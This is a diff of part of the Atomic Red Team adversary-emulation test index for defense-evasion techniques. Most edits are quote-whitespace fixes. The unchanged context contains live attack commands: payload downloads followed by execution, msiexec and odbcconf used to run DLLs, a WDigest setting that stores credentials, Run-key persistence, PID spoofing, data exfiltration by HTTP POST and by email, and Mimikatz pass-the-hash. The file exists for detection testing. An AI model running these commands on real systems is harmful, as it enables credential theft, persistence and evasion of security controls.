$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
@@ -30914,10 +30914,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -30982,10 +30982,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31028,7 +31028,7 @@ defense-evasion:
description: 'Executes the installer assembly class constructor. Upon execution,
version information will be displayed the .NET framework install utility.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31053,10 +31053,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31099,7 +31099,7 @@ defense-evasion:
description: 'Executes the Install Method. Upon execution, version information
will be displayed the .NET framework install utility.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31124,10 +31124,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31170,7 +31170,7 @@ defense-evasion:
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31195,10 +31195,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31242,7 +31242,7 @@ defense-evasion:
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31267,10 +31267,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31313,7 +31313,7 @@ defense-evasion:
description: 'Executes the Uninstall Method. Upon execution, help information
will be displayed for InstallUtil.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31338,10 +31338,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31395,10 +31395,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31605,7 +31605,7 @@ defense-evasion:
description: 'Changes a file or folder''s permissions using chmod and a specified
numeric mode.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31621,14 +31621,14 @@ defense-evasion:
executor:
command: 'chmod #{numeric_mode} #{file_or_folder}
-'
+ '
name: bash
- name: chmod - Change file or folder mode (symbolic mode)
auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3
description: 'Changes a file or folder''s permissions using chmod and a specified
symbolic mode.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31644,14 +31644,14 @@ defense-evasion:
executor:
command: 'chmod #{symbolic_mode} #{file_or_folder}
-'
+ '
name: bash
- name: chmod - Change file or folder mode (numeric mode) recursively
auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified numeric mode.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31667,14 +31667,14 @@ defense-evasion:
executor:
command: 'chmod -R #{numeric_mode} #{file_or_folder}
-'
+ '
name: bash
- name: chmod - Change file or folder mode (symbolic mode) recursively
auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified symbolic mode.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31690,14 +31690,14 @@ defense-evasion:
executor:
command: 'chmod -R #{symbolic_mode} #{file_or_folder}
-'
+ '
name: bash
- name: chown - Change file or folder ownership and group
auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0
description: 'Changes a file or folder''s ownership and group information using
chown.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31717,14 +31717,14 @@ defense-evasion:
executor:
command: 'chown #{owner}:#{group} #{file_or_folder}
-'
+ '
name: bash
- name: chown - Change file or folder ownership and group recursively
auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848
description: 'Changes a file or folder''s ownership and group information recursively
using chown.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31744,13 +31744,13 @@ defense-evasion:
executor:
command: 'chown -R #{owner}:#{group} #{file_or_folder}
-'
+ '
name: bash
- name: chown - Change file or folder mode ownership only
auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99
description: 'Changes a file or folder''s ownership only using chown.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31766,13 +31766,13 @@ defense-evasion:
executor:
command: 'chown #{owner} #{file_or_folder}
-'
+ '
name: bash
- name: chown - Change file or folder ownership recursively
auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2
description: 'Changes a file or folder''s ownership only recursively using chown.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31788,7 +31788,7 @@ defense-evasion:
executor:
command: 'chown -R #{owner} #{file_or_folder}
-'
+ '
name: bash
- name: chattr - Remove immutable file attribute
auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f
@@ -31806,7 +31806,7 @@ defense-evasion:
executor:
command: 'chattr -i #{file_to_modify}
-'
+ '
name: sh
T1078.003:
technique:
@@ -32047,7 +32047,7 @@ defense-evasion:
C# project example file (T1127.001.csproj) will simply print "Hello From a
Code Fragment" and "Hello From a Class." to the screen.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -32067,10 +32067,10 @@ defense-evasion:
dependencies:
- description: 'Project file must exist on disk at specified location (#(unknown))
-'
+ '
prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#(unknown)"
@@ -32083,7 +32083,7 @@ defense-evasion:
Visual Basic example file (vb.xml) will simply print "Hello from a Visual
Basic inline task!" to the screen.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -32103,10 +32103,10 @@ defense-evasion:
dependencies:
- description: 'Project file must exist on disk at specified location (#(unknown))
-'
+ '
prereq_command: 'if (Test-Path #(unknown)) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #(unknown)) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#(unknown)"
@@ -32229,7 +32229,7 @@ defense-evasion:
Red Team repo, and mount the image. The provided sample ISO simply has a Reports
shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -32241,20 +32241,20 @@ defense-evasion:
dependencies:
- description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
-'
+ '
prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
executor:
command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
-'
+ '
cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
-'
+ '
name: powershell
- name: Mount an ISO image and run executable from the ISO
auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
@@ -32276,10 +32276,10 @@ defense-evasion:
dependencies:
- description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
-'
+ '
prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
@@ -32313,18 +32313,18 @@ defense-evasion:
- description: A test file with the Zone.Identifier attribute must be present.
prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 }
-'
+ '
get_prereq_command: |
Invoke-WebRequest #{file_to_download} -OutFile #{file_path}
Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'
executor:
command: 'Unblock-File -Path #{file_path}
-'
+ '
cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value
''[ZoneTransfer]'',''ZoneId=3''
-'
+ '
name: powershell
T1036.004:
technique:
@@ -32401,7 +32401,7 @@ defense-evasion:
schtasks /query /tn win32times
cleanup_command: 'schtasks /tn win32times /delete /f
-'
+ '
name: command_prompt
elevation_required: true
- name: Creating W32Time similar named service using sc
@@ -32416,7 +32416,7 @@ defense-evasion:
sc qc win32times
cleanup_command: 'sc delete win32times
-'
+ '
name: command_prompt
elevation_required: true
T1036:
@@ -32519,11 +32519,11 @@ defense-evasion:
prereq_command: 'if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip"
#{url}
-'
+ '
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
@@ -32598,7 +32598,7 @@ defense-evasion:
description: 'Create and execute a process from a directory masquerading as
the current parent directory (`...` instead of normal `..`)
-'
+ '
supported_platforms:
- macos
- linux
@@ -32622,7 +32622,7 @@ defense-evasion:
description: 'Launch an executable that attempts to masquerade as a legitimate
executable.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -32645,7 +32645,7 @@ defense-evasion:
cleanup_command: 'Remove-Item -Path "#{executable_filepath}" -ErrorAction
Ignore
-'
+ '
name: powershell
T1218.013:
technique:
@@ -32941,11 +32941,11 @@ defense-evasion:
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
-'
+ '
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/v HideFileExt /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Modify Registry of Local Machine - cmd
@@ -32965,11 +32965,11 @@ defense-evasion:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
-'
+ '
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/v SecurityHealth /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Modify registry to store logon credentials
@@ -32984,11 +32984,11 @@ defense-evasion:
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1 /f
-'
+ '
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Add domain to Trusted sites Zone
@@ -33029,11 +33029,11 @@ defense-evasion:
command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -Value "''"
-'
+ '
name: command_prompt
T1218.007:
technique:
@@ -34063,7 +34063,7 @@ defense-evasion:
auto_generated_guid: a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
description: 'Executes an MSI containing embedded JScript code using msiexec.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34076,30 +34076,30 @@ defense-evasion:
j (advertise). The included MSI is designed to support all three action
types.
-'
+ '
type: String
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with embedded VBScript
auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
description: 'Executes an MSI containing embedded VBScript code using msiexec.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34112,30 +34112,30 @@ defense-evasion:
j (advertise). The included MSI is designed to support all three action
types.
-'
+ '
type: String
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with an embedded DLL
auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
description: 'Executes an MSI containing an embedded DLL using msiexec.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34148,30 +34148,30 @@ defense-evasion:
j (advertise). The included MSI is designed to support all three action
types.
-'
+ '
type: String
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with an embedded EXE
auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
description: 'Executes an MSI containing an embedded EXE using msiexec.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34184,31 +34184,31 @@ defense-evasion:
j (advertise). The included MSI is designed to support all three action
types.
-'
+ '
type: String
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
-'
+ '
name: command_prompt
- name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
description: 'Executes an MSI containing embedded JScript code using the WMI
Win32_Product class
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34220,32 +34220,32 @@ defense-evasion:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
-'
+ '
type: String
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
-'
+ '
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
auto_generated_guid: cf470d9a-58e7-43e5-b0d2-805dffc05576
description: 'Executes an MSI containing embedded VBScript code using the WMI
Win32_Product class
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34257,32 +34257,32 @@ defense-evasion:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
-'
+ '
type: String
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
-'
+ '
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
auto_generated_guid: 32eb3861-30da-4993-897a-42737152f5f8
description: 'Executes an MSI containing an embedded DLL using the WMI Win32_Product
class
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34294,32 +34294,32 @@ defense-evasion:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
-'
+ '
type: String
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
-'
+ '
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
auto_generated_guid: 55080eb0-49ae-4f55-a440-4167b7974f79
description: 'Executes an MSI containing an embedded EXE using the WMI Win32_Product
class
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34331,25 +34331,25 @@ defense-evasion:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
-'
+ '
type: String
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
-'
+ '
name: powershell
- name: Msiexec.exe - Execute the DllRegisterServer function of a DLL
auto_generated_guid: 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
@@ -34357,7 +34357,7 @@ defense-evasion:
Note: the DLL included in the "src" folder is only built for 64-bit, so this
won''t work on a 32-bit OS.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34369,17 +34369,17 @@ defense-evasion:
dependencies:
- description: 'The DLL must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /y "#{dll_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
@@ -34387,7 +34387,7 @@ defense-evasion:
function. Note: the DLL included in the "src" folder is only built for 64-bit,
so this won''t work on a 32-bit OS.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34400,17 +34400,17 @@ defense-evasion:
dependencies:
- description: 'The DLL must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /z "#{dll_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute Remote MSI file
auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
@@ -34418,7 +34418,7 @@ defense-evasion:
in application installation, commonly seen in malware execution. The MSI executes
a built-in JScript payload that launches powershell.exe.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34429,7 +34429,7 @@ defense-evasion:
executor:
command: 'msiexec.exe /q /i "#{msi_payload}"
-'
+ '
name: command_prompt
T1564.004:
technique:
@@ -34569,7 +34569,7 @@ defense-evasion:
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Create ADS command prompt
auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb
@@ -34593,7 +34593,7 @@ defense-evasion:
for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name} >nul 2>&1
-'
+ '
name: command_prompt
- name: Create ADS PowerShell
auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
@@ -34615,13 +34615,13 @@ defense-evasion:
dependencies:
- description: 'The file must exist on disk at specified location (#{file_name})
-'
+ '
prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
-'
+ '
get_prereq_command: 'New-Item -Path #{file_name} | Out-Null
-'
+ '
executor:
command: |
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
@@ -34629,7 +34629,7 @@ defense-evasion:
set-content -path . -stream #{ads_filename} -value "test3"
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
-'
+ '
name: powershell
T1599.001:
technique:
@@ -34838,7 +34838,7 @@ defense-evasion:
auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
description: 'Add a Network Share utilizing the command_prompt
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34855,7 +34855,7 @@ defense-evasion:
auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222'
description: 'Removes a Network Share utilizing the command_prompt
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34866,13 +34866,13 @@ defense-evasion:
executor:
command: 'net share #{share_name} /delete
-'
+ '
name: command_prompt
- name: Remove Network Share PowerShell
auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3
description: 'Removes a Network Share utilizing PowerShell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35117,14 +35117,14 @@ defense-evasion:
cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
-Name #{registry_entry_storage}
-'
+ '
name: powershell
- name: Execution from Compressed File
auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
description: 'Mimic execution of compressed executable. When successfully executed,
calculator.exe will open.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35136,11 +35136,11 @@ defense-evasion:
dependencies:
- description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
-'
+ '
prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0}
else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
@@ -35148,7 +35148,7 @@ defense-evasion:
executor:
command: '"%temp%\temp_T1027.zip\T1027.exe"
-'
+ '
cleanup_command: |
taskkill /f /im calculator.exe >nul 2>nul
rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
@@ -35182,7 +35182,7 @@ defense-evasion:
command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
-Attachments #{input_file} -SmtpServer #{smtp_server}
-'
+ '
name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
@@ -35203,7 +35203,7 @@ defense-evasion:
executor:
command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
-'
+ '
name: powershell
- name: Obfuscated Command in PowerShell
auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
@@ -35211,7 +35211,7 @@ defense-evasion:
"Hello, from PowerShell!". Example is from the 2021 Threat Detection Report
by Red Canary.
-'
+ '
supported_platforms:
- windows
executor:
@@ -35222,7 +35222,7 @@ defense-evasion:
120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { (
[CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
-'
+ '
name: powershell
- name: Obfuscated Command Line using special Unicode characters
auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f
@@ -35320,7 +35320,7 @@ defense-evasion:
auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2
description: 'Execute arbitrary DLL file stored locally.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35332,17 +35332,17 @@ defense-evasion:
dependencies:
- description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
executor:
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
-'
+ '
name: command_prompt
T1134.004:
technique:
@@ -35455,10 +35455,10 @@ defense-evasion:
dependencies:
- description: 'DLL to inject must exist on disk at specified location (#{dll_path})
-'
+ '
prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
@@ -35499,7 +35499,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
''#{command_line}'' -ParentId #{parent_pid}'
@@ -35528,7 +35528,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
#{test_guid}'
@@ -35558,7 +35558,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
@@ -35594,7 +35594,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
-FilePath #{file_path} -CommandLine ''#{command_line}'''
@@ -35679,7 +35679,7 @@ defense-evasion:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -35694,13 +35694,13 @@ defense-evasion:
command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
/ntlm:#{ntlm}"
-'
